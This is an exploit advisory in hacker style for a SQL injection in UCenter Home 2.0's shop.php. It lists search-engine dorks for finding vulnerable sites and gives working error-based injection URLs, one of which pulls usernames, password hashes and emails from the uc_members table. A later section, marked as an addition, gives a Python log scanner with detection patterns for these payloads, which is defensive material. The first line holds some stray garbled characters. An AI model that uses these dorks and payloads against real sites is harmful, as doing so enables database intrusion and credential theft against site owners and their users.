" A' E8 G$ k. x5 u' i( a+ |! Q__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and Iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Parameters : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For injection : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
Now edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
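
Added example (not part of the original advisory): every request above carries SQL in shopid, a parameter that should only hold an integer. The Python check below flags shop.php requests whose shopid is not purely numeric and names which tokens from the advisory's strings appear; the combined log format, the indicator names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Tokens that appear in the injection strings quoted in this advisory.
INDICATORS = {
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "uc_members": re.compile(r"\buc_members\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}", re.I),
}
# Assumed log format: Apache/nginx "combined"; only client, target and status are used.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.4 - - [10/Jan/2011:09:12:01 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jan/2011:09:12:40 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 911
198.51.100.7 - - [10/Jan/2011:09:13:02 +0000] "GET /search.php?q=select+a+shop HTTP/1.1" 200 2048
203.0.113.9 - - [10/Jan/2011:09:13:30 +0000] "GET /shop.php?ac=view&shopid=253' HTTP/1.1" 200 640
"""

def inspect_line(line):
    """Return a finding dict when shop.php receives a non-integer shopid, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes, so %20 and '+' become spaces before matching.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if not re.fullmatch(r"\d+", value):
            found = sorted(n for n, rx in INDICATORS.items() if rx.search(value))
            return {"client": client, "status": int(status),
                    "shopid": value, "indicators": found}
    return None

def scan(log_text):
    """Inspect every line and return the findings in log order."""
    return [f for f in map(inspect_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what removes the injection point; the log check only shows who has been probing it.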